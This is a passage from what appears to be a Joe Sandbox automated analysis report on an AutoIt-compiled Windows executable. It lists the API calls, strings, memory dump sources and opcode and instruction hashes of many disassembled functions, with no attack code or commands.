                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: d761649b584883a59066ca9b9a8d69b2c6f95d6ff9ecc189edae9c790ed788af
                                                • Instruction ID: 3c1534b2a030fb03245b74e2b0ced393ec2cc02bb94eb4a41e7b0ae06c0aa047
                                                • Opcode Fuzzy Hash: d761649b584883a59066ca9b9a8d69b2c6f95d6ff9ecc189edae9c790ed788af
                                                • Instruction Fuzzy Hash: 725164724087459BD320EF10DC86BEFBBE8FB85344F81885CF2D981095EBB58529DB66
                                                APIs
                                                  • Part of subcall function 00F84F0B: __fread_nolock.LIBCMT ref: 00F84F29
                                                • _wcscmp.LIBCMT ref: 00FE9824
                                                • _wcscmp.LIBCMT ref: 00FE9837
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: ebfc0d818f49ca8497816daccddd313b19f2b2614885faa40a4614c515c4e2a9
                                                • Instruction ID: de07e8c5706e88597d007b6f29b4eff6570c663921c0ae0ce634c9254106a443
                                                • Opcode Fuzzy Hash: ebfc0d818f49ca8497816daccddd313b19f2b2614885faa40a4614c515c4e2a9
                                                • Instruction Fuzzy Hash: ED41D871A0424ABADF20ABA5CC45FEFB7BDDF86710F00406AF904A7190D7B5AA049B61
                                                APIs
                                                • _memset.LIBCMT ref: 00FF259E
                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00FF25D4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CrackInternet_memset
                                                • String ID: |
                                                • API String ID: 1413715105-2343686810
                                                • Opcode ID: f9cb74da22e4f2a4b1a31659bbfec6ac7f694600a1978253b6027182f2e56682
                                                • Instruction ID: 19e9c3459cc8295a5310ab7b584a85bf3f26b38f037b33a0b97f90f821d5c54e
                                                • Opcode Fuzzy Hash: f9cb74da22e4f2a4b1a31659bbfec6ac7f694600a1978253b6027182f2e56682
                                                • Instruction Fuzzy Hash: 34312871804219ABCF51EFA5CC85EEEBFB8FF08350F100069F915A6162EB359956EB60
                                                APIs
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 01007B61
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01007B76
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: d5bdd010d5daede422ed6dd9f0258154251dddd29d40c1fabd5f153d29fb01d9
                                                • Instruction ID: 73b4fdf797fe134b19c5cac5e97172c8039641162471d2e966d28ac8f1bc77b4
                                                • Opcode Fuzzy Hash: d5bdd010d5daede422ed6dd9f0258154251dddd29d40c1fabd5f153d29fb01d9
                                                • Instruction Fuzzy Hash: 68413E74A013099FEB55CF68C980BDA7BF5FF09300F10016AEA84AB381D735A951CF90
                                                APIs
                                                • DestroyWindow.USER32(?,?,?,?), ref: 01006B17
                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01006B53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$DestroyMove
                                                • String ID: static
                                                • API String ID: 2139405536-2160076837
                                                • Opcode ID: 4c960f3f70986340346b2f600777117108b2573bce3d490beb6c1e19aa7708cc
                                                • Instruction ID: 1c0965514b073fafb04b65eb0dc36feca6a23f00fec8355ab72bc5c541022dac
                                                • Opcode Fuzzy Hash: 4c960f3f70986340346b2f600777117108b2573bce3d490beb6c1e19aa7708cc
                                                • Instruction Fuzzy Hash: 6D31C171100605AFEB129F68CC80BFB77E9FF48720F008619F9E997190DA36AC91DB60
                                                APIs
                                                • _memset.LIBCMT ref: 00FE2911
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FE294C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 37ba1f5270c1be8be1297636687d85e4f47f1956a616c7be5eca1e3c6300d835
                                                • Instruction ID: 8af62d3522ddb914f08b87fb109f001b40b509aeae5cf2e50f48f81462f10539
                                                • Opcode Fuzzy Hash: 37ba1f5270c1be8be1297636687d85e4f47f1956a616c7be5eca1e3c6300d835
                                                • Instruction Fuzzy Hash: 9131F571A003859BEB64CF5ACC85BAEBBBCEF05360F141019E985A61A2FB709940FB11
                                                APIs
                                                • __snwprintf.LIBCMT ref: 00FF3A66
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __snwprintf_memmove
                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                • API String ID: 3506404897-2584243854
                                                • Opcode ID: 3243849e0d3ae86f8e1256e2569398e22a4edc8801a325993d2513a7015a8be4
                                                • Instruction ID: 81ee277128f193d3a2fd67726f0c720509118fc699afeeb6c7aa95db0fdd12ee
                                                • Opcode Fuzzy Hash: 3243849e0d3ae86f8e1256e2569398e22a4edc8801a325993d2513a7015a8be4
                                                • Instruction Fuzzy Hash: 7521E13560020DABCF10FF65CC82AEEBBB9AF44700F104499F544AB152DB38EA41EB61
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01006761
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0100676C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 75ff5baa4271207e45b464064139a02f5fa888b336eee6e772203da9aa46320b
                                                • Instruction ID: 1514c730cae631479b2779d47a9a12a80e4c1efd2c592e4f641fedd6b27c2006
                                                • Opcode Fuzzy Hash: 75ff5baa4271207e45b464064139a02f5fa888b336eee6e772203da9aa46320b
                                                • Instruction Fuzzy Hash: AD1196752001096FFF639E58CC80EAB37ABFB48354F100125F598972D1E6769C6187A0
                                                APIs
                                                  • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                                                  • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                                                  • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                                                • GetWindowRect.USER32(00000000,?), ref: 01006C71
                                                • GetSysColor.USER32(00000012), ref: 01006C8B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: a47e508728c16645badc5d44b5bb8d2b08fe5d94d71f68bc874753c9f18b97c1
                                                • Instruction ID: fdf24c55bfd736890d42aa91054dc86eba3f411664893a38b2f47d95c215a122
                                                • Opcode Fuzzy Hash: a47e508728c16645badc5d44b5bb8d2b08fe5d94d71f68bc874753c9f18b97c1
                                                • Instruction Fuzzy Hash: D1214A7291020AAFEB15DFA8CC45EFA7BA9FB08304F004618F995D2240D636E8619B60
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 010069A2
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010069B1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: fadb7e9f79b6e81b45a009895b78c83710edc3488d8f39fb92e3c12901f89d84
                                                • Instruction ID: 23b1a671216f00f4baf91f1c9beba3901783fc8f80611d23a42e2c218ecaaf9e
                                                • Opcode Fuzzy Hash: fadb7e9f79b6e81b45a009895b78c83710edc3488d8f39fb92e3c12901f89d84
                                                • Instruction Fuzzy Hash: 4A116D71100205ABFB629E68DC44AEB36AEEB05374F504714F9E1975D0C676DC61A760
                                                APIs
                                                • _memset.LIBCMT ref: 00FE2A22
                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FE2A41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 8fdd00cf2a8f4fa23b9f121e74cfe82cf32b751fe1ab6092b380b087b824a6fc
                                                • Instruction ID: 80baaf913714a1c26e45162d7ba267f7ce13e14e08e5970cb9421cd5725d8501
                                                • Opcode Fuzzy Hash: 8fdd00cf2a8f4fa23b9f121e74cfe82cf32b751fe1ab6092b380b087b824a6fc
                                                • Instruction Fuzzy Hash: 34112272D00294ABDB70DB99DC44BAE73BDAB46B20F044031E855E7290E778AD0AE791
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FF222C
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FF2255
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: c1cd9fbb3bc6ca188be269a7045a7d516133837766c5ea8eaa4f2fc93298915c
                                                • Instruction ID: 03afaee911b360f53d33e37d8ccd0fdc0b36cad0c5361dafc062f05fe878b93c
                                                • Opcode Fuzzy Hash: c1cd9fbb3bc6ca188be269a7045a7d516133837766c5ea8eaa4f2fc93298915c
                                                • Instruction Fuzzy Hash: E2110670941229BAEB258F518C99FBBFBACFF06761F10821AF64486050D7705941E6F1
                                                APIs
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                  • Part of subcall function 00FDAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAABC
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FD8E73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 1fe0574b8e8f9097b6ed6ecfb38ef5744cec6fcb04ed37f98eb9acedcf7a3328
                                                • Instruction ID: 1285ef7da1fabb4420d538c10669a36a3c380a3a52cf3f916d38b330012335ec
                                                • Opcode Fuzzy Hash: 1fe0574b8e8f9097b6ed6ecfb38ef5744cec6fcb04ed37f98eb9acedcf7a3328
                                                • Instruction Fuzzy Hash: 2401F5B2A41219ABCF14FBE0CC419FE736AAF45360B580A0AF861573D1DE399809E750
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: b26380d4e82694b9720ba8b8807169f4b85979b9b8508c1c7a144c1be4d44b6d
                                                • Instruction ID: 1eb7bc7dcee9831c73f8066ea6d4f17123e4258cc43dab625b8107536b0f8992
                                                • Opcode Fuzzy Hash: b26380d4e82694b9720ba8b8807169f4b85979b9b8508c1c7a144c1be4d44b6d
                                                • Instruction Fuzzy Hash: 0B01F972C042587EDB28DBA9CC56EEE7BF8DB11711F00419FF556D2181E879A6049760
                                                APIs
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                  • Part of subcall function 00FDAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAABC
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FD8D6B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: ebf6c674bb60c5ea7e88127d15c616e3b98abd26ac30ae3398fa09b9ba33b357
                                                • Instruction ID: 610799110432e9c70c3170fe9556a3ed07a9e268bffbc6d8ac4542ee131c5492
                                                • Opcode Fuzzy Hash: ebf6c674bb60c5ea7e88127d15c616e3b98abd26ac30ae3398fa09b9ba33b357
                                                • Instruction Fuzzy Hash: B001D4B2A41109ABCF15FBA0CD52AFE73AA9F15350F54001AB802672D1DE299E08F371
                                                APIs
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                  • Part of subcall function 00FDAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAABC
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FD8DEE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 775181621a2e827b3afd957e27c3d956a6f2a89cebb40322ae3672e246c3c9e2
                                                • Instruction ID: 3b9112c367090960582533ae844320612f160c595f67d507e58591250a3b11c8
                                                • Opcode Fuzzy Hash: 775181621a2e827b3afd957e27c3d956a6f2a89cebb40322ae3672e246c3c9e2
                                                • Instruction Fuzzy Hash: 1001F7B2A41109A7CF11F7A4CD42AFE73AE8F11350F140116B841A33D1DE298E09F271
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
